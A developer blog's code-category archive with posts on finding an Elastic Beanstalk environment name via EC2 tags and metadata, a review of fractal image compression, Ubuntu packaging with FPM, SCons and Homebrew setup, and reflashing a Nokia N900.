Category Archives: code

How to find the name of an Elastic Beanstalk environment from inside one of its instances

At Thumbtack, we’ve started using Amazon Elastic Beanstalk (EB) to deploy web services. We already use Papertrail as a log aggregator for our existing systems, and have installed their syslog forwarding agent on our EB apps using .ebextensions. However, I didn’t have a way to group log output from multiple EB-managed EC2 instances, or distinguish EB environments by name, because the default EC2 hostnames are just prefixed IP addresses. So I decided to use the EB environment name, which is unique across all EC2 regions, and tell Papertrail’s agent to use that instead of a hostname.

EB sets the environment ID and name as the elasticbeanstalk:environment-id and elasticbeanstalk:environment-name EC2 tags on all of the parts of an EB app environment: load balancer, EC2 instances, security groups, etc. Surprisingly, EC2 tags aren’t available to instances through the instance metadata interface, but they are available through the normal AWS API’s DescribeTags call. EB app container instances are based on Amazon Linux and have Python 2.6 and Boto preinstalled, so rather than go through the shell gyrations suggested by StackOverflow, I wrote a Python script (get-eb-env-name.py) that uses Boto to fetch the instance ID and region, then uses those two together with the instance’s IAM role to fetch its own tags, and prints the environment name.

You’ll need to make sure the IAM role used by your EB app environment has permissions to describe tags, as well as describing instances and possibly instance reservations as well. I’ve included an IAM policy file (EC2-Describe-IAM-policy.json) that you can apply to your IAM role to grant it the permission to describe any EC2 resource.

See my gist:

[gist 08880dc2c74b9c26cb5b /]

There’s an annoying wrinkle around getting the region for an EC2 instance through the instance metadata: you can’t, at least not through a directly documented method. You can get the availability zone (AZ) from http://169.254.169.254/latest/meta-data/placement/availability-zone, which will be something like us-west-2a, and then drop the last letter, giving you a region name like us-west-2. However, Amazon has never documented the relationship between AZ names and region names, so it’s possible this could break in the future.

You can also fetch an instance identity document in JSON format from http://169.254.169.254/latest/dynamic/instance-identity/document. Its contents aren’t documented either, but on all the EC2 instances I’ve examined, it looks like this, and contains the region as well as the AZ:

{
  "instanceId" : "i-12abcdef",
  "billingProducts" : null,
  "architecture" : "x86_64",
  "imageId" : "ami-dc123456",
  "pendingTime" : "2014-12-18T01:20:42Z",
  "instanceType" : "m3.2xlarge",
  "accountId" : "1234567890",
  "kernelId" : null,
  "ramdiskId" : null,
  "region" : "us-west-2",
  "version" : "2010-08-31",
  "privateIp" : "172.16.1.1",
  "availabilityZone" : "us-west-2a",
  "devpayProductCodes" : null
}

Since the instance identity document actually has a key named region, I decided to go with that method to find the region for an EC2 instance from inside that instance.

Previously, we’d set an environment variable or customize a config file to tell Papertrail what “hostname” to use. Finding the EB environment name at runtime from EC2 tags means that we don’t have to customize EB app bundles for each target environment, and thus can use the same app bundle across multiple environments; for example, from a CI build server’s test environment to a staging environment, and then to production.

Tagged , , , , , ,

A Review of Fractal Image Compression and Related Algorithms

I wrote this review paper on fractal image compression, denoising, and enlargement back in 2008 while I was at Caltech, and thought I’d lost it until discovering a copy in my backups. Fractal compression is a fascinating area, and I went on to prototype a GPGPU-accelerated image enlarger as my capstone graphics project. It actually predates OpenCL, and I hope to come back to it someday for an overhaul, using this paper for reference.

A Review of Fractal Image Compression and Related Algorithms

Jeremy Ehrhardt – 2008-03-18

Introduction

Fractal image compression is a curious diversion from the main road of raster image compression techniques. Fractal compressors do not store pixel values. Rather, they store a fractal, the attractor of which is the image that was encoded. This representation of an image has a number of useful properties.

The property that drove initial development of the field is that images with fractal properties can potentially be encoded in very few bits if a close match for their generating fractal can be found. Fractal-like images are frequently found in nature, so fractal compression promised very high compression ratios for natural scenes such as clouds, landscapes, forests, etc. Another useful property is the scale independence of fractals. Fractal-encoded images may be decoded at larger or smaller sizes than the original without major distortion.

This review covers major developments unique to fractal image compression. Many published algorithms incorporate general data compression techniques such as vector quantization and entropy coding (as many non-fractal compressors do), but the details are best covered by general data compression literature, and have thus been omitted. There is also some recent work hybridizing fractal and wavelet compression, which is best left to a review of wavelet-based methods, and has also been omitted.

The first problem in the field was proving that it was possible to find a fractal representation for any image. This was proved possible with the Collage Theorem, which was followed by the development of an algorithm to generate fractal representations for arbitrary images. The algorithm was slow, so subsequent work looked at improving the speed of the search for fractal representations, and also on improving their quality. The partitioning of the image to be encoded was a common target for improvement, and several of the important schemes are discussed below.

Unfortunately, fractal compression was found to have some problems. Early research did not establish that natural images were actually self-similar to such a degree that fractal compression was the best fit. Additionally, optimal encoding was found to be NP-hard. These difficulties are the reason that fractal codecs are virtually nonexistent in the current graphics universe, having been superseded by other codecs with more general applications and higher speeds.

However, the useful properties of fractal encodings have found some use outside of the performance-sensitive area of compression. Two fractal image-processing algorithms are discussed in the last section; one for image enlargement, and one for noise removal. First, we will discuss the development of fractal image compression, from the initial mathematical development of the field in the late 1980s and the first implementation in the early 1990s, up through the various improvements over the following decades.

The Collage Theorem

Barnsley’s 1985 Collage Theorem [BARNSLEY] p. 89 made fractal image compression possible. It states that, given an iterated function system (IFS, a list of repeatedly applied contractive transforms) and some subset of a complete metric space, in order for the attractor of the IFS to be “close” to the given subset, the union of the images of the subset transformed by the member transforms of the IFS must be “close” to the original subset (for a certain definition of “close”). The Collage Theorem thus establishes a guideline for finding fractal approximations to images: work out transforms that take parts of an image to itself. The attractor of the transforms will then be close to the original image.

Barnsley presents a number of examples of simple fractals for which the reader is encouraged to figure out suitable IFS representations by hand. Barnsley does not, however, elaborate on how to find such an IFS representation for an arbitrary image.

Beginnings of fractal image compression

The first algorithm capable of generating an IFS fractal representation for an arbitrary raster image was proposed by Barnsley’s graduate student Jacquin [JACQUIN1]. Jacquin’s fractal coding scheme is based on non-overlapping square block partitions of the image being encoded. It defines a “distortion” measure based on the L2 distance between the pixels of two image blocks, as well as a number of contractive linear transformations that act on image blocks. The transformations used include geometric transforms from isometries of the square blocks, as well as pixel value transforms that change the overall luminance of the block being transformed.

Figure 1: Transformations used by Jacquin’s original algorithm [JACQUIN1, Table 1]. Transformations used by Jacquin's original algorithm.

Jacquin’s algorithm divides the image to be encoded into “domain” blocks of a given size, and classifies the blocks into classes based on their appearance: shade, midrange, simple edge, or mixed edge. Partitioning the blocks in this way reduces the pool of blocks that must be searched in the next step. The algorithm then divides the image into “range” blocks containing a quarter of the number of pixels, and iterates through them. For each range block, it searches other domain blocks in that class, looking for a transformation or transformations that map a domain block to the range block with minimum distortion. (Domain blocks are downsampled to the same number of pixels as range blocks for the distortion calculation.)

Figure 2: The fractal encoding process [JACQUIN2, Fig. 2]. Rᵢ is a range block, D is the domain block pool, and T is the transform pool. The fractal encoding process.

This process produces a list of self-similarity-producing transforms, from regions of the image to other regions of the image, that constitute an IFS with the original image as the fractal’s attractor. If it can’t find a transformation for some domain block with a measured distortion less than a given threshold, the domain block is partitioned into 4 equally sized square children, and the search is repeated with the children as domain blocks.

Reconstructing an image from its IFS representation is a much simpler procedure than the above encoding algorithm. The list of transforms is applied some number of times to an arbitrary image. With each iteration, since the original image is the fixed point of the IFS, the starting image is transformed to more closely resemble the original encoded image. The image may be reconstructed at a higher or lower quality by increasing or decreasing the number of iterations.

Figure 3: Reconstruction of a fractally encoded image: starting image (a), 1 iteration (b), 2 iterations (c), and 10 iterations (d). [FISHER, Fig. 1.10] Reconstruction of a fractally encoded image.

Jacquin [JACQUIN1] demonstrated encoding and decoding on the standard Lena test image. It does not contain coding speed or memory usage statistics for the test image, so it is impossible to discern whether the paper’s fractal coding scheme is competitive with other image compression schemes of the time. Jacquin published a clarified and expanded version of this encoding procedure two years later [JACQUIN2]. Almost all fractal image compression algorithms are extended versions of this algorithm.

Improvements in partitioning

The simple two-level image partitioning scheme used by Jacquin has been the target for replacement in later work. The motivation in changing the partitioning scheme is reducing the error in the mapping between range and domain blocks, and thus improving the fidelity of the image encoding. Fisher describes two partitioning schemes that improve on Jacquin.

Figure 4: Fixed partitioning [WOHLBERG1, Fig. 2a]. Fixed partitioning.

Figure 5: Quadtree partitioning [WOHLBERG1, Fig. 2b]. Quadtree partitioning.

Figure 6: HV partitioning [WOHLBERG1, Fig. 2c]. HV partitioning.

Figure 7: Delaunay partitioning [WOHLBERG1, Fig. 3c]. Delaunay partitioning.

Fisher describes quadtree partitioning [FISHER, Ch. 3] as “a ‘typical’ fractal scheme and a good first step for those wishing to implement their own.” A quadtree is a data structure that subdivides 2D space: each node represents a square area, and nodes may be subdivided into four equally sized square child nodes. Quadtree partitioning is an “adaptive” scheme that produces different partitions for different images, based on their content. Fisher’s quadtree algorithm first subdivides the image to be encoded several times, producing a balanced quadtree several layers deep. The leaf nodes of this initial quadtree are range blocks as in Jacquin [JACQUIN2]. Domain blocks are chosen from nodes that are one level closer to the root than the range blocks, and thus four times the area. All domain blocks are compared with each range block, and if no transformation can be found that maps a domain block to the range block under consideration with less than some threshold level of distortion, the range block is subdivided. It may be recursively subdivided several times until a low-distortion mapping from a domain block is found, or a maximum tree depth is reached.

Jacquin’s original partitioning scheme is almost a special case of quadtree partitioning with a minimum depth of n and maximum depth of n+1, where n is however many partitions it takes to subdivide the image into blocks of the desired range block size, and the levels of the tree closer to the root are not actually represented in the scheme’s data structures.

HV partitioning [FISHER, Ch. 6] is similar to quadtree partitioning in that it involves recursive partitioning of rectangular areas. When a quadtree range block is split, it is always divided into four equal areas. HV partitioning has an additional adaptive element: when a HV-tree range block is split, the orientation (horizontal or vertical) and position of the dividing line is chosen to maximize the difference between average pixel values on either side of the line, with a bias applied to prefer splits that do not create very thin sub-rectangles. The goal of HV partitioning is to create a partition of the image that better corresponds to the structure of the image than a quadtree partition, and thus use fewer ranges when encoding the image, improving encoding time and quality.

A drawback of HV partitioning is the greater variety of possible transformations between range and domain blocks, since both are rectangles of essentially arbitrary dimensions, rather than squares with power-of-two dimensions. This increases both search times and the number of bits required to represent a mapping, although the generally lower number of mappings required offsets the latter.

Fisher notes a weakness in both quadtree and HV partitioning: reconstructed images suffer from visible blockiness at all but the highest reconstruction qualities. Fisher’s quadtree partitioning [FISHER, Ch. 3] deals with this by applying a heuristic deblocking filter during image reconstruction. The filter averages pixels on either side of a range block boundary, with pixels on the inside weighted by a factor proportional to the range block’s depth in the quadtree. Fisher describes a similar procedure for blocks in an HV tree [FISHER, Ch. 6]. Blocky artifacts are by no means unique to these two schemes or fractal image compression in general; IDCT-based codecs such as JPEG and the MPEG family are also susceptible to blockiness. The JPEG standard does not include a deblocking filter, but some MPEG variants do, such as H.264.

One scheme [DAVOINE] not based on rectangular blocks uses a mesh partition made up of triangles, which is generated by repeated adaptive Delaunay triangulation and triangle splitting. The goal of this scheme is to cover the image in triangles that are as large as possible while maintaining a variance in internal pixel brightness values that is less than some threshold parameter (triangles meeting this condition are “homogenous”). Thus, regions with internal brightness boundaries are split up. Delaunay triangulation was chosen to minimize the number of thin triangles, and thus reduce numerical problems when the internal pixels of a triangle are read from the image raster.

Initially, the image is covered with a regular grid of vertices. In the splitting phase, the Delaunay triangulation of the vertices is calculated; then, for every triangle that is not homogenous, a new vertex is added in the barycenter of that triangle. Splitting is repeated until convergence, or until some iteration limit is reached. In the merge phase, the algorithm removes vertices for which all surrounding triangles have similar pixel value mean and variance. Then a final triangulation is performed. This procedure is used to generate both domain and range sets of triangles, with domain triangles permitted a greater variance.

Adaptive triangular partitions generally use fewer blocks than quadtree or HV partitions. An additional advantage of triangular blocks is that inter-block seams do not always line up with pixel boundaries, so there is less visible blockiness in the decoded image. The major disadvantage is that both encoding and decoding require transformations between arbitrarily shaped triangular range and domain blocks; this involves substantially more interpolation than the rectangle-based schemes.

Difficulties of fractal image compression

Since the idea behind fractal image compression is that the image being compressed can be modeled as a fractal, useful fractal image compression requires that the image actually have fractal characteristics so that it can be efficiently modeled that way. Clarke & Linnett [CLARKE] pointed out that while fractal image compression is frequently proposed as a compression scheme for images of nature (such as plants, landscapes, clouds), it is not necessarily the case that those images have the affine self-similarities required for effective compression by existing fractal compression schemes, or indeed, that they have any fractal characteristics at all.

Figure 8: Fractal fern [FERN1]. Fractal fern.

Figure 9: Real fern [FERN2]. Real fern.

As an example, they observed that there are significant differences between a simple computer-generated fractal fern and a photo of a real fern. A fractal fern is highly idealized and may be represented very efficiently by a fractal model, but a natural fern does not have its perfect regularity, and the self-similarity breaks down at some scales. In particular, the fern leaves resemble the whole fern, but are different structures nonetheless, and can only be approximated by small copies of the whole fern.

Wohlberg & de Jager [WOHLBERG2] examined statistical properties of natural images with regard to fractal image encoding, specifically with regard to the deterministic self-similar fractal representations used by all of the above algorithms. Their conclusions seem to confirm the assertion of Clarke & Linnett: “The form of self-affinity considered here therefore does not appear to represent a more accurate characterization of image statistics than vastly simpler models such as multiresolution autoregressive models.”

It has been proved [MATTHIAS] that finding an optimal fractal encoding for an arbitrary image is NP-hard. Furthermore, it has been proved that algorithms derived from Jacquin’s original Collage Theorem-based algorithm do not generate approximations to optimal encodings. So, at least with currently known encoding methods, there is an unavoidable tradeoff between fast (polynomial-time) encoding and obtaining the highest quality representation that will fit in a given amount of space. This is a huge disadvantage relative to other image compression methods: for example, JPEG’s IDCT block coding processes one fixed-size block of pixels at a time, which results in an encoding time that is a linear function of the number of samples in the original image.

Fractal image processing

Authors focused on image compression have treated the iterative reconstruction process for fractal image encodings as a way to control the quality of a reconstructed image. Polidori & Dugelay [POLIDORI] examined the reconstruction process as a procedure for image enlargement.

The most commonly used algorithms for this purpose are variations on polynomial interpolation of samples (the pixels of the original image). The assumption underlying polynomial interpolation is that the samples are from a smooth continuous function. Polidori & Dugelay made a different assumption: that the function that the image was sampled from is fractal in nature, instead of smooth. Then a fractal encoding of that image would be an approximation of that fractal. Since fractals are scale-independent, the image could then be reconstructed at any size from the encoding.

Polidori & Dugelay first examined fractal image encoding and decoding schemes identical to those developed for image compression, based on nonoverlapping partitions of the image. They found that such schemes tended to produce blocky reconstructed images with undesirable artifacts when used to reconstruct images at a larger size than the original image. They then examined the idea of using overlapped domain blocks, which retain redundant information not desirable for compression applications, but useful for image enlargement. They proposed and tested several methods of recombining the overlapped blocks, with some methods yielding enlargements with visual quality comparable to those obtained through classical interpolation.

Another image processing technique that makes use of the scale independence of fractal image encoding is fractal denoising. Additive white Gaussian noise (AWGN) is common in images acquired from noisy sensors or transmitted through noisy communications channels. Images containing this kind of noise can be modeled as a series of samples where each sample is the sum of the value from the noise-free original and a value taken from a Gaussian distribution. Obviously, this model is scale-dependent, and one might expect that fractal image encoding poorly represents AWGN.

In fact, this is the case. Ghazel, Freeman & Vrscay [GHAZEL] noticed that “straightforward fractal-based coding performs rather well as a denoiser”. This motivated the development of their denoising algorithm, which goes a step further than that, and statistically estimates a fractal encoding of the noise-free image from a fractal encoding of an AWGN-contaminated noisy image.

In the first step of the algorithm, the noisy image is examined for areas with nearly uniform pixel values. The differences in value from pixel to pixel in such regions is likely due to noise, so the variance of the AWGN can be estimated from the variance of these regions. The image is then encoded as a series of transformations from domain blocks to range blocks in the usual fashion. (Adaptive quadtree partitioning is used, as it results in the best quality of reconstructed images.) Each transformation in the encoding that affects pixel values (“gray-level” transforms, as opposed to “geometric” transforms} is adjusted using the previously estimated variance according to a simple relation. Finally, the image is reconstructed from the modified fractal encoding.

Figure 10: Comparison of fractal denoising and Lee filtering [GHAZEL]. Comparison of fractal denoising and Lee filtering.

Ghazel, Freeman & Vrscay report that fractal denoising is competitive with or superior to Lee filtering, which is a common locally adaptive linear denoising algorithm. Furthermore, fractal denoising is more likely to outperform Lee filtering as the variance of the AWGN increases, making the fractal method an attractive choice for processing very noisy images.

Conclusion

A review of fractal image compression cannot fail to state this: despite years of improvements, such as the previously discussed partitioning schemes, fractal image compression is not competitive with current block IDCT or wavelet methods. The speed and quality issues noted above have prevented broad use of fractals for storage of compressed images.

However, fractal image processing techniques have found some application: fractal image enlargement was eventually commercialized as a product known as Genuine Fractals [GENUINEFRACTALS] which is well known within the desktop publishing industry as a high-quality image scaler suitable for making large prints from digital photos.

References

BARNSLEY

Barnsley, M. F. (1988). Fractals Everywhere, Academic Press Inc., US.

JACQUIN1

Jacquin, A. E. (1990). A novel fractal block-coding technique for digital images. Acoustics,
Speech, and Signal Processing, 1990. ICASSP-90., 1990 International Conference on.

JACQUIN2

Jacquin, A. E. (1992). “Image coding based on a fractal theory of iterated contractive image transformations.” Image Processing, IEEE Transactions on 1(1): 18-30.

JACQUIN3

Jacquin, A. E. (1993). “Fractal image coding: a review.” Proceedings of the IEEE 81(10): 1451-1465.

CLARKE

Clarke, R. J. and L. M. Linnett (1993). “Fractals and image representation.” Electronics & Communication Engineering Journal 5(4): 233-239.

DIETMAR

Dietmar, S. and H. Raouf (1994). “A review of the fractal image compression literature.” SIGGRAPH Comput. Graph. 28(4): 268-276.

FISHER

Fisher, Y. (1995). Fractal image compression: theory and application, Springer-Verlag London, UK.

POLIDORI

Polidori, E. and J. L. Dugelay (1995). Zooming using IFS. NATO ASI Conf. Fractal Image Encoding and Analysis}, Trondheim.

DAVOINE

Davoine, F., M. Antonini, et al. (1996). “Fractal image compression based on Delaunay triangulation and vector quantization.” Image Processing, IEEE Transactions on 5(2): 338-346.

MATTHIAS

Matthias, R. and H. Hannes (1997). Optimal Fractal Coding is NP-Hard. Proceedings of the Conference on Data Compression, IEEE Computer Society.

WOHLBERG1

Wohlberg, B. and G. De Jager (1999). “A review of the fractal image coding literature.” Image Processing, IEEE Transactions on 8(12): 1716-1729.

WOHLBERG2

Wohlberg, B. and G. de Jager (1999). “A class of multiresolution stochastic models generating self-affine images.” Signal Processing, IEEE Transactions on 47(6): 1739-1742.

GHAZEL

Ghazel, M., G. H. Freeman, et al. (2003). “Fractal image denoising.” Image Processing, IEEE Transactions on 12(12): 1560-1578.

GENUINEFRACTALS

onOne Software, Inc. “Genuine Fractals 5.” Retrieved 2008-03-17, from http://www.ononesoftware.com/products/genuine_fractals.php.

FERN1

Mihályi, A. “Fractal fern.” Retrieved 2008-03-17, from http://en.wikipedia.org/wiki/Image:Fractal_fern1.png.

FERN2

“Olegivvit”. “Leaf of fern.” Retrieved 2008-03-17, from http://en.wikipedia.org/wiki/Image:Fern-leaf-oliv.jpg.

Tagged , , ,

Package your own mod_auth_openid 0.9 for Ubuntu

First, you’ll need the Debian New Maintainers’ Guide… just kidding. It’s totally useless. Don’t bother with it unless you really care about copyright metadata.

We’ll be using Jordan Sissel’s FPM (“Effing package management!”) utility to turn a packaging directory into an actual .deb package. The packaging directory has the same structure as /: an /etc, a /usr, a /usr/lib, and so forth, and we’ll put build products from mod_auth_openid‘s Autotools project into it.

I’ve put the instructions into a gist, which should work on Ubuntu 13 (Ringtail/Salamander) and probably higher.

Note some minor wrinkles: APXS doesn’t respect the DESTDIR environment variable, so we can’t use make install into the packaging directory, and instead will have to assemble the contents of the packaging directory by hand.

See my GDC 2014 slides!

I recently had the privilege of presenting a talk at GDC 2014 for KIXEYE: Building Customer Support and Loyalty, in which I talked about how and why KIXEYE built the Monocle customer support system as a web app, the challenges and rewards of building a uniform support API across multiple games, and how designing games with support scenarios in mind yields benefits across the whole product. Pretty exciting to get to show off my whole team’s work. The full talk will be in the GDC Vault later this month, but for now, I’ve uploaded slides:

Modifying SCons environment variables, globally

SCons, the Python-based build system, tries to isolate itself from the user’s environment as much as possible, so that one developer’s weird environment variables don’t lead to an irreproducible build. This is great until you want to use tools from places that SCons doesn’t think are standard, in which case you can make use of its site_scons extension mechanism to make them standard.

In this case, I’m using Homebrew. Homebrew normally installs into /usr/local. I think this default is completely mental, because /usr/local is the Balkans of Mac software packaging: routinely invaded and full of land mines. I’ve installed Homebrew into /opt/homebrew, where it’s safe from having parts overwritten at random by unmanaged package installers. For Make builds, I’ve included these lines at the end of my .zshrc to make Homebrew components available:

export PATH="/opt/homebrew/bin:$PATH"
export CFLAGS='-I/opt/homebrew/include
export LDFLAGS='-L/opt/homebrew/lib'

For SCons, I’ve created the file $HOME/.scons/site_scons/site_init.py to modify the Environment object used by SCons subprocesses:

Specifically, my site_init.py decorates the Environment initializer to always add Homebrew to the PATH, and now I have binaries like sdl-config available. (SCons has support for parsing the flags emitted by those config programs.) This should extend to CFLAGS and LDFLAGS, except that they’re most likely strings instead of lists. I’ve since refined the GIST to add CFLAGS, CXXFLAGS, and LDFLAGS to the SCons environment.

The end result is that I can assume that any SCons build on my system will have access to libraries and tools installed through Homebrew.

Tagged ,

connecting a Raspberry Pi to a Nokia N900 using USB networking

I’ve got a Nokia N900 going spare since I upgraded to a phone for which people actually write apps. Lots of possibilities with the N900. It’s got a shedload of radios, a decent CPU, an IR blaster, and not one but two cameras. The one thing it doesn’t have is any way to plug in more things.

Enter the Raspberry Pi I got at PyCon last week. It comes with lots of GPIO pins, and a USB port where one might plausibly plug in an N900. Clearly, these two devices were meant to be friends. Let’s get them talking.

Prepping the N900

The N900 runs Maemo, a heavily customized Debian fork, which was a fine OS for a hackable device. However, I used mine as an actual phone for several years, and it’s gotten kinda janky, so I’m going to blast it back to factory-fresh and then bring it up to the latest community-developed version of Maemo.

Reset N900 to factory state

Maemo wiki: updating the firmware

Using flasher 3.5 on Win7 x64, installed to C:\Program Files (x86)\maemo\flasher-3.5.
Install libusb 1.2.2.0 from SourceForge. Copy amd64 version of libusb0.dll to flasher install dir.

Shut down N900. While holding down U key on N900 keyboard, plug USB cable into PC.

Run libusb bin\inf-wizard.exe. Select “Nokia N900 (Update mode)” from device list. Create a .inf, save it, and install the .inf using the “Install Now” button. Click past the unsigned driver warnings.

Open a console as an administrator. cd to flasher install dir. Run flasher-3.5.exe --read-device-id to see if the flasher app works.
result:

flasher v2.5.2 (Sep 24 2009)

USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x0105.
Found device RX-51, hardware revision 2101
NOLO version 1.4.14
Version of 'sw-release': RX-51_2009SE_21.2011.38-1.002_PR_002

Flash eMMC image

This is the user filesystem. I got the latest version from http://skeiron.org/tablets-dev/nokia_N900/.

C:\Program Files (x86)\maemo\flasher-3.5>flasher-3.5.exe -F C:\Users\jeremye\Downloads\RX-51_2009SE_10.2010.13-2.VANILLA_PR_EMMC_MR0_ARM.bin -f
flasher v2.5.2 (Sep 24 2009)

Image 'mmc', size 255947 kB
        Version RX-51_2009SE_10.2010.13-2.VANILLA
USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x0105.
Found device RX-51, hardware revision 2101
NOLO version 1.4.14
Version of 'sw-release': RX-51_2009SE_21.2011.38-1.002_PR_002
Booting device into flash mode.
Suitable USB device not found, waiting.
USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x01c8.
Raw data transfer EP found at EP2.
[init        20 %   32768 /  255947 kB     0 kB/s]

Unplug N900’s USB cable. Remove battery. Wait until N900 shuts down. Replace battery. While holding down U, reconnect USB cable.

Flash rootfs image

This is where Linux lives. I used Maemo 5 PR 1.3.1, which is the very last official version, postdates the skeiron.org mirror, and can be found on Nokia’s files site by Googling parts of the filename: RX-51_2009SE_21.2011.38-1_PR_COMBINED_MR0_ARM.bin

C:\Program Files (x86)\maemo\flasher-3.5>flasher-3.5.exe -F "C:\Users\jeremye\Downloads\RX-51_2009SE_21.2011.38-1_PR_COMBINED_MR0_ARM.bin" -f -R
flasher v2.5.2 (Sep 24 2009)

SW version in image: RX-51_2009SE_21.2011.38-1_PR_MR0
Image 'kernel', size 1705 kB
        Version 2.6.28-20103103+0m5
Image 'rootfs', size 185728 kB
        Version RX-51_2009SE_21.2011.38-1_PR_MR0
Image 'cmt-2nd', size 81408 bytes
        Version BB5_09.36
Image 'cmt-algo', size 519808 bytes
        Version BB5_09.36
Image 'cmt-mcusw', size 5826 kB
        Version rx51_ICPR82_10w08
Image '2nd', size 14720 bytes
        Valid for RX-51: 2217, 2218, 2219, 2220, 2120
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2217, 2218, 2219, 2220, 2120
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2217, 2218, 2219, 2220, 2120
        Version 1.4.14.9+0m5
Image '2nd', size 14720 bytes
        Valid for RX-51: 2101, 2102, 2103
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2101, 2102, 2103
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2101, 2102, 2103
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2307, 2308, 2309, 2310
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2307, 2308, 2309, 2310
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2307, 2308, 2309, 2310
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2407, 2408, 2409, 2410
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2407, 2408, 2409, 2410
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2407, 2408, 2409, 2410
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2301, 2302, 2303, 2304, 2305, 2306
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2301, 2302, 2303, 2304, 2305, 2306
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2301, 2302, 2303, 2304, 2305, 2306
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2401, 2402, 2403, 2404, 2405, 2406
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2401, 2402, 2403, 2404, 2405, 2406
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2401, 2402, 2403, 2404, 2405, 2406
        Version 1.4.14.9+0m5
Image '2nd', size 14720 bytes
        Valid for RX-51: 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2104, 2105, 2106, 2107, 2108, 2109, 2110, 2111, 2112, 2113, 2114, 2115, 2116, 2117, 2118, 2119
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2501, 2502, 2503, 2504, 2505, 2506
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2501, 2502, 2503, 2504, 2505, 2506
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2501, 2502, 2503, 2504, 2505, 2506
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2607, 2608, 2609, 2610
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2607, 2608, 2609, 2610
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2607, 2608, 2609, 2610
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2507, 2508, 2509, 2510
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2507, 2508, 2509, 2510
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2507, 2508, 2509, 2510
        Version 1.4.14.9+0m5
Image '2nd', size 14720 bytes
        Valid for RX-51: 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2201, 2202, 2203, 2204, 2205, 2206, 2207, 2208, 2209, 2210, 2211, 2212, 2213, 2214, 2215, 2216
        Version 1.4.14.9+0m5
Image '2nd', size 14848 bytes
        Valid for RX-51: 2601, 2602, 2603, 2604, 2605, 2606
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2601, 2602, 2603, 2604, 2605, 2606
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2601, 2602, 2603, 2604, 2605, 2606
        Version 1.4.14.9+0m5
USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x0105.
Found device RX-51, hardware revision 2101
NOLO version 1.4.14
Version of 'sw-release': RX-51_2009SE_21.2011.38-1.002_PR_002
Sending xloader image (14 kB)...
100% (14 of 14 kB, avg. 2900 kB/s)
Sending secondary image (106 kB)...
100% (106 of 106 kB, avg. 13359 kB/s)
Flashing bootloader... done.
Sending cmt-2nd image (79 kB)...
100% (79 of 79 kB, avg. 13250 kB/s)
Sending cmt-algo image (507 kB)...
100% (507 of 507 kB, avg. 25381 kB/s)
Sending cmt-mcusw image (5826 kB)...
100% (5826 of 5826 kB, avg. 31839 kB/s)
Flashing cmt-mcusw... done.
Sending kernel image (1705 kB)...
100% (1705 of 1705 kB, avg. 30459 kB/s)
Flashing kernel... done.
Sending and flashing rootfs image (185728 kB)...
100% (185728 of 185728 kB, avg. 13689 kB/s)
Finishing flashing... done
CMT flashed successfully

-R flag reboots N900 after flash. N900 goes through “5 white dots” boot seq, then asks for date and time input. Looks like all settings were wiped out, as planned.

Install community-maintained Maemo (CSSU)

Maemo wiki: Community SSU

Go to http://repository.maemo.org/community/community-fremantle.install in Nokia Web to install Stable variant of CSSU. Add the catalog. Let it install the CSSU Enabler. Click through all the messages. Close the app manager and open the Community SSU app that it just installed. If it complains about HAM (the app manager) still being open, just run it again. Once it’s done, it’ll return you to HAM. Click Update All to install the CSSU Maemo update, which is a 34 MB download and may take a while over WiFi.

Fill the temporal void with fruit salad.

